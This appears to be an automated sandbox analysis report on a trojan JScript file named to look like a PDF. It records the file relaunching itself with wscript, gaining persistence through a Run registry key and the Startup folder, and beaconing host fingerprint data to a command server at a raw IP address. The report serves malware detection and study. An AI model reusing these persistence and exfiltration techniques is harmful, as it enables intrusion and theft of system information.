    Source: Scan_Revised-SOP_MCA_pdf.jsReturn value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W', 'a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x7', '"a%b%c%d%e%f%g%h%i%Ex%j%k%l%m%n%o%p%q%r%s%t%u%v%w%x%y%z%A%B%C%D%E%F%G%H%I%J%K%L%M%N%O%P%Q%R%S%T%U%V%', '"a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x']
    Source: Scan_Revised-SOP_MCA_pdf.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: Scan_Revised-SOP_MCA_pdf.jsReturn value : ['"msxml2.xmlhttp",""', '"msxml2.xmlhttp"']
    Source: Scan_Revised-SOP_MCA_pdf.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: Scan_Revised-SOP_MCA_pdf.jsReturn value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: Scan_Revised-SOP_MCA_pdf.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: Scan_Revised-SOP_MCA_pdf.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: Scan_Revised-SOP_MCA_pdf.jsReturn value : ['"MSXML2.XMLHTTP"', '"MSXML2.XMLHTTP",""']
    Source: Scan_Revised-SOP_MCA_pdf.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: Scan_Revised-SOP_MCA_pdf.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: Scan_Revised-SOP_MCA_pdf.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: Scan_Revised-SOP_MCA_pdf.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: unknownNetwork traffic detected: HTTP traffic on port 59389 -> 9334
    Source: unknownNetwork traffic detected: HTTP traffic on port 59390 -> 9334
    Source: global trafficTCP traffic: 192.168.2.7:59389 -> 91.92.243.39:9334
    Source: Joe Sandbox ViewASN Name: THEZONEBG THEZONEBG
    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.243.39
    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.243.39
    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.243.39
    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.243.39
    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.243.39
    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.243.39
    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.243.39
    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.243.39
    Source: unknownHTTP traffic detected: POST /is-ready HTTP/1.1Accept: */*user-agent: B81A4609<|>user-PC<|>user<|>Microsoft Windows 10 Pro<|>Plus<|>Windows Defender .<|>false - 15/10/2024Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 91.92.243.39:9334Content-Length: 0Connection: Keep-AliveCache-Control: no-cache

    Key, Mouse, Clipboard, Microphone and Screen Capturing

    barindex
    Source: Yara matchFile source: dump.pcap, type: PCAP

    System Summary

    barindex
    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
    Source: C:\Windows\System32\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\Scan_Revised-SOP_MCA_pdf.js"
    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\WScript.exe" //B "C:\Users\user\AppData\Roaming\Scan_Revised-SOP_MCA_pdf.js"
    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\WScript.exe" //B "C:\Users\user\AppData\Roaming\Scan_Revised-SOP_MCA_pdf.js"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\Scan_Revised-SOP_MCA_pdf.js"Jump to behavior
    Source: Scan_Revised-SOP_MCA_pdf.jsInitial sample: Strings found which are bigger than 50
    Source: classification engineClassification label: mal100.troj.expl.evad.winJS@6/4@0/1
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Scan_Revised-SOP_MCA_pdf.jsJump to behavior
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_Process
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_Process
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_Process
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_Process
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_Process
    Source: C:\Windows\System32\wscript.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: Scan_Revised-SOP_MCA_pdf.jsReversingLabs: Detection: 13%
    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scan_Revised-SOP_MCA_pdf.js"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\Scan_Revised-SOP_MCA_pdf.js"
    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\WScript.exe" //B "C:\Users\user\AppData\Roaming\Scan_Revised-SOP_MCA_pdf.js"
    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\WScript.exe" //B "C:\Users\user\AppData\Roaming\Scan_Revised-SOP_MCA_pdf.js"
    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Scan_Revised-SOP_MCA_pdf.js"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\Scan_Revised-SOP_MCA_pdf.js"Jump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: napinsp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: pnrpnsp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wshbth.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: nlaapi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: winrnr.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
    Source: C:\Windows\System32\wscript.exeAutomated click: OK
    Source: C:\Windows\System32\wscript.exeAutomated click: OK

    Data Obfuscation

    barindex
    Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: wscript.exe%20%2F%2FB%20%22%22 a1:%22C%3A%5CUsers%5Cuser%5CAppData%5CRoaming%5C%22");ITextStream.WriteLine(" exit:60633 r:%22wscript.exe%20%2F%2FB%20%22C%3A%5CUsers%5Cuser%5CAppData%5CRoaming%5C%22");ITextStream.WriteLine(" entry:60655");ITextStream.WriteLine(" exec:28538 f:");ITextStream.WriteLine(" entry:28541 f:_0x41DE4");ITextStream.WriteLine(" exec:334 f:_0x41DE4");ITextStream.WriteLine(" exit:28541 f:_0x41DE4 r:%22Scan_Revised-SOP_MCA_pdf.js%22");ITextStream.WriteLine(" exit:60655 r:%22Scan_Revised-SOP_MCA_pdf.js%22");ITextStream.WriteLine(" entry:60630 f:_0x41118 a0:%22wscript.exe%20%2F%2FB%20%22C%3A%5CUsers%5Cuser%5CAppData%5CRoaming%5C%22 a1:%22Scan_Revised-SOP_MCA_pdf.js%22");ITextStream.WriteLine(" exit:60630 f:_0x41118 r:%22wscript.exe%20%2F%2FB%20%22C%3A%5CUsers%5Cuser%5CAppData%5CRoaming%5CScan_Revised-SOP_MCA_pdf.js%22");ITextStream.WriteLine(" entry:60622 a0:%22wscript.exe%20%2F%2FB%20%22C%3A%5CUsers%5Cuser%5CAppData%5CRoaming%5CScan_Revised-SOP_MCA_pdf.js%22 a1:%22%22%22");ITextStream.WriteLine(" exit:60622 r:%22wscript.exe%20%2F%2FB%20%22C%3A%5CUsers%5Cuser%5CAppData%5CRoaming%5CScan_Revised-SOP_MCA_pdf.js%22%22");IWshShell3._00000000();ITextStream.WriteLine(" entry:60599 o: f:run a0:%22wscript.exe%20%2F%2FB%20%22C%3A%5CUsers%5Cuser%5CAppData%5CRoaming%5CScan_Revised-SOP_MCA_pdf.js%22%22");IWshShell3.Run("wscript.exe //B "C:\Users\user\AppData\Roaming\Scan_Revised-SOP_MCA_pdf.js"");ITextStream.WriteLine(" exit:60746 r:false");ITextStream.WriteLine(" entry:60761");ITextStream.WriteLine(" exec:129817 f:");ITextStream.WriteLine(" entry:129821 f:_0x43F4E a0:t%20bil%23i2lPRNrt%23etb%23%23cei1OTF1p11p1eneecOsonAetnsmn13e1rdde%23l1am%23o%2F1%2311ntytts%23%23e%23%23jmerFs1llposrg1OvdbetpC%23D1a%23to%23Uouem%25Li1r1ts11w%23teEueS1PrztR%20a)rt%231%23c1%23op");ITextStream.WriteLine(" exit:129821 f:_0x43F4E r:false");ITextStream.WriteLine(" entry:129829");ITextStream.WriteLine(" exec:103886 f:");ITextStream.WriteLine(" entry:103890 a0:function%20() a1:%22%230%22");ITextStream.WriteLine(" exit:103890 r:false");ITextStream.WriteLine(" exit:129829 r:undefined");ITextStream.WriteLine(" entry:129844 a0:function%20() a1:true");ITextStream.WriteLine(" exit:129844 r:false");ITextStream.WriteLine(" entry:129876");ITextStream.WriteLine(" exec:129455 f:");ITextStream.WriteLine(" entry:129458");ITextStream.WriteLine(" exec:28608 f:");ITextStream.WriteLine(" entry:28612 f:_0x43F4E a0:t%20bil%23i2lPRNrt%23etb%23%23cei1OTF1p11p1eneecOsonAetnsmn13e1rdde%23l1am%23o%2F1%2311ntytts%23%23e%23%23jmerFs1llposrg1OvdbetpC%23D1a%23to%23Uouem%25Li1r1ts11w%23teEueS1PrztR%20a)rt%231%23c1%23opt");ITextStream.WriteLine(" exit:28612 f:_0x43F4E r:false");ITextStream.WriteLine(" entry:28622 f:_0x42EF4");ITextStream.WriteLine(" exec:310 f:_0x42EF4");IWshShell3._00000000();ITextStream.WriteLine(" exit:28622 f:_0x42EF4 r:");IWshShell3._00000000();ITextStream.WriteLine(" exit:129458 r:");IWshShell3._00000000();ITextStream.WriteLine(" exi
    Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: setRequestHeader a0:%22user-agent%3A%22 a1:%22B81A4609%3C%7C%3Euser-PC%3C%7C%3Euser%3C%7C%3EMicrosoft%20Windows%2010%20Pro%3C%7C%3EPlus%3C%7C%3EWindows%20Defender%20.%3C%7C%3Efalse%20-%2015%2F10%2");IServerXMLHTTPRequest2.setRequestHeader("user-agent:", "B81A4609<|>user-PC<|>user<|>Microsoft Windows 10 Pro<|>Plus<|>Windows Defender .<|>false - ");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" exit:147019 o: f:setRequestHeader r:undefined");ITextStream.WriteLine(" entry:147082");ITextStream.WriteLine(" exec:116117 f:");ITextStream.WriteLine(" entry:116121 a0:r%25tl%25xNxvm%25rEtrjTnrx%25Tsktl%25mrnpodp%25nej%25sorm3%25rid9x%25dFzr%2Feut%3DeDyt%25YEG%25dm2fPibtL%25KreaOedAe%25deS%25esOaUoufmel%25Zets1gI%25lE7t1%256t%7BR%20%25ee!ca%25%23%25psn%25%26%5Caf(i%25i%20s%");ITextStream.WriteLine(" exit:116121 r:false");ITextStream.WriteLine(" entry:116184 f:_0x41284 a0:function%20_0x28242(_0x24D4B%2C%20_0x24A18) a1:true");ITextStream.WriteLine(" exit:116184 f:_0x41284 r:false");ITextStream.WriteLine(" entry:116204");ITextStream.WriteLine(" exec:27833 f:");ITextStream.WriteLine(" entry:27836 f:_0x42E3E");ITextStream.WriteLine(" exec:534 f:_0x42E3E");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" exit:27836 f:_0x42E3E r:");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" exit:116204 r:");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" exit:147082 r:");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" entry:147080 o: f:send a0:%22%22");IServerXMLHTTPRequest2.send("");ITextStream.WriteLine(" entry:147536 a0:%22B81A4609%3C%7C%3Euser-PC%3C%7C%3Euser%3C%7C%3EMicrosoft%20Windows%2010%20Pro%3C%7C%3EPlus%3C%7C%3EWindows%20Defender%20.%3C%7C%3Efalse%20-%2015%2F10%2F2024%22 a1:%22%22");ITextStream.WriteLine(" exit:147536 r:false");ITextStream.WriteLine(" entry:151103 f:_0x43F4E a0:t%20bil%23i2lPRNrt%23etb%23%23cei1OTF1p11p1eneecOsonAetnsmn13e1rdde%23l1am%23o%2F1%2311ntytts%23%23e%23%23jmerFs1llposrg1OvdbetpC%23D1a%23to%23Uouem%25Li1r1ts11w%23teEueS1PrztR%20a)rt%231%23c1%23op");ITextStream.WriteLine(" exit:151103 f:_0x43F4E r:false");ITextStream.WriteLine(" entry:151120");ITextStream.WriteLine(" exec:107488 f:");ITextStream.WriteLine(" entry:107492 a0:r%25tl%25xNxvm%25rEtrjTnrx%25Tsktl%25mrnpodp%25nej%25sorm3%25rid9x%25dFzr%2Feut%3DeDyt%25YEG%25dm2fPibtL%25KreaOedAe%25deS%25esOaUoufmel%25Zets1gI%25lE7t1%256t%7BR%20%25ee!ca%25%23%25psn%25%26%5Caf(i%25i%20s%");ITextStream.WriteLine(" exit:107492 r:false");ITextStream.WriteLine(" entry:107530");ITextStream.WriteLine(" exec:27879 f:");ITextStream.WriteLine(" entry:27883 f:_0x41229 a0:function%20_0x28242(_0x24D4B%2C%20_0x24A18) a1:true");ITextStream.WriteLine(" exit:27883 f:_0x41229 r:false");ITextStream.WriteLine(" entry:27892 f:_0x43943");ITextStream.WriteLine(" exec:526 f:_0x43943");ITextStream.WriteLine(" exit:27892 f:_0x43943 r:%22B81A4609%3C%7C%3Euser-PC%3C%7C%3Euser%3C%7C%3EMicrosoft%20Windows%2010%20Pro%3C%7C%3EPlus%3C%7C%3

    Boot Survival

    barindex
    Source: C:\Windows\System32\wscript.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Scan_Revised-SOP_MCA_pdfJump to behavior
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Scan_Revised-SOP_MCA_pdf.jsJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Scan_Revised-SOP_MCA_pdf.jsJump to behavior
